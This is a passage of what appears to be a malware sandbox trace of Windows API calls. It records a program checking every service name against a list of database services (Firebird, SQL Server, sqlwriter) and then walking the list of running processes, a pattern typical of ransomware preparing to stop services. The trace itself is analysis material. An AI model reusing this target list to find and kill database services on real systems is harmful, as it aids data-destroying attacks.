(lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0186.575] lstrlenW (lpString="LanmanServer") returned 12 [0186.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0186.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0186.576] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0186.576] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0186.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0186.576] lstrlenW (lpString="LanmanWorkstation") returned 17 [0186.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0186.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0186.576] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0186.576] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0186.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0186.576] lstrlenW (lpString="lfsvc") returned 5 [0186.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0186.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0186.576] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0186.576] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0186.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0186.576] lstrlenW (lpString="lmhosts") returned 7 [0186.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0186.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0186.576] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0186.576] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0186.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0186.576] lstrlenW (lpString="LSM") returned 3 [0186.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0186.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0186.576] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0186.576] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0186.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0186.576] lstrlenW (lpString="MpsSvc") returned 6 [0186.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0186.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0186.577] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0186.577] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0186.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0186.577] lstrlenW (lpString="NcbService") returned 10 [0186.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0186.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0186.577] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0186.577] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0186.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0186.577] lstrlenW (lpString="netprofm") returned 8 [0186.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0186.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0186.577] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0186.577] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0186.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0186.577] lstrlenW (lpString="NgcSvc") returned 6 [0186.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0186.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0186.577] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0186.577] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0186.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0186.577] lstrlenW (lpString="NlaSvc") returned 6 [0186.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0186.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0186.577] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0186.577] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0186.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0186.577] lstrlenW (lpString="nsi") returned 3 [0186.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0186.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0186.578] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0186.578] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0186.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0186.578] lstrlenW (lpString="PcaSvc") returned 6 [0186.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0186.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0186.578] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0186.578] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0186.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0186.578] lstrlenW (lpString="PlugPlay") returned 8 [0186.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0186.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0186.578] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0186.578] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0186.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0186.578] lstrlenW (lpString="Power") returned 5 [0186.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0186.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0186.578] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0186.578] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0186.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0186.578] lstrlenW (lpString="ProfSvc") returned 7 [0186.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0186.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0186.578] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0186.578] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0186.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0186.578] lstrlenW (lpString="RpcEptMapper") returned 12 [0186.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0186.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0186.579] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0186.579] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0186.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0186.579] lstrlenW (lpString="RpcSs") returned 5 [0186.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0186.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0186.579] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0186.579] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0186.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0186.579] lstrlenW (lpString="SamSs") returned 5 [0186.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0186.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0186.579] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0186.579] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0186.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0186.579] lstrlenW (lpString="Schedule") returned 8 [0186.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0186.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0186.579] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0186.579] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0186.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0186.579] lstrlenW (lpString="SecurityHealthService") returned 21 [0186.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0186.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0186.579] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0186.579] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0186.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0186.579] lstrlenW (lpString="SENS") returned 4 [0186.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0186.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0186.579] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0186.580] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0186.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0186.580] lstrlenW (lpString="ShellHWDetection") returned 16 [0186.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0186.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0186.580] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0186.580] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0186.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0186.580] lstrlenW (lpString="Spooler") returned 7 [0186.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0186.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0186.580] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0186.580] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0186.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0186.580] lstrlenW (lpString="StateRepository") returned 15 [0186.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0186.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0186.580] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0186.580] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0186.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0186.580] lstrlenW (lpString="SysMain") returned 7 [0186.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0186.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0186.580] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0186.580] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0186.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0186.580] lstrlenW (lpString="SystemEventsBroker") returned 18 [0186.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0186.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0186.580] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0186.581] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0186.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0186.581] lstrlenW (lpString="Themes") returned 6 [0186.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0186.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0186.581] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0186.581] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0186.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0186.581] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0186.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0186.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0186.581] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0186.581] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0186.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d7798 | out: hHeap=0x680000) returned 1 [0186.581] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x350 [0186.584] Process32FirstW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.585] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0186.586] lstrlenW (lpString="System") returned 6 [0186.586] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0186.674] lstrlenW (lpString="smss.exe") returned 8 [0186.674] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.675] lstrlenW (lpString="csrss.exe") returned 9 [0186.675] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0186.676] lstrlenW (lpString="wininit.exe") returned 11 [0186.676] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.676] lstrlenW (lpString="csrss.exe") returned 9 [0186.676] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0186.677] lstrlenW (lpString="winlogon.exe") returned 12 [0186.677] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0186.678] lstrlenW (lpString="services.exe") returned 12 [0186.678] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0186.679] lstrlenW (lpString="lsass.exe") returned 9 [0186.679] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0186.680] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0186.680] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0186.680] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0186.680] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.681] lstrlenW (lpString="svchost.exe") returned 11 [0186.681] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.682] lstrlenW (lpString="svchost.exe") returned 11 [0186.682] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0186.682] lstrlenW (lpString="dwm.exe") returned 7 [0186.683] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.683] lstrlenW (lpString="svchost.exe") returned 11 [0186.683] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.684] lstrlenW (lpString="svchost.exe") returned 11 [0186.684] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.685] lstrlenW (lpString="svchost.exe") returned 11 [0186.685] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.685] lstrlenW (lpString="svchost.exe") returned 11 [0186.685] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.686] lstrlenW (lpString="svchost.exe") returned 11 [0186.686] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.687] lstrlenW (lpString="svchost.exe") returned 11 [0186.687] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.688] lstrlenW (lpString="svchost.exe") returned 11 [0186.688] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.689] lstrlenW (lpString="svchost.exe") returned 11 [0186.689] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.690] lstrlenW (lpString="svchost.exe") returned 11 [0186.690] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.690] lstrlenW (lpString="svchost.exe") returned 11 [0186.690] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0186.691] lstrlenW (lpString="spoolsv.exe") returned 11 [0186.691] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.692] lstrlenW (lpString="svchost.exe") returned 11 [0186.692] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0186.692] lstrlenW (lpString="audiodg.exe") returned 11 [0186.692] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0186.693] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0186.693] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0186.694] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0186.694] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0186.695] lstrlenW (lpString="Memory Compression") returned 18 [0186.695] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0186.696] lstrlenW (lpString="sihost.exe") returned 10 [0186.696] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.697] lstrlenW (lpString="svchost.exe") returned 11 [0186.697] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0186.697] lstrlenW (lpString="msoia.exe") returned 9 [0186.697] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0186.698] lstrlenW (lpString="taskhostw.exe") returned 13 [0186.698] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.699] lstrlenW (lpString="explorer.exe") returned 12 [0186.699] Process32NextW (in: hSnapshot=0x350, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 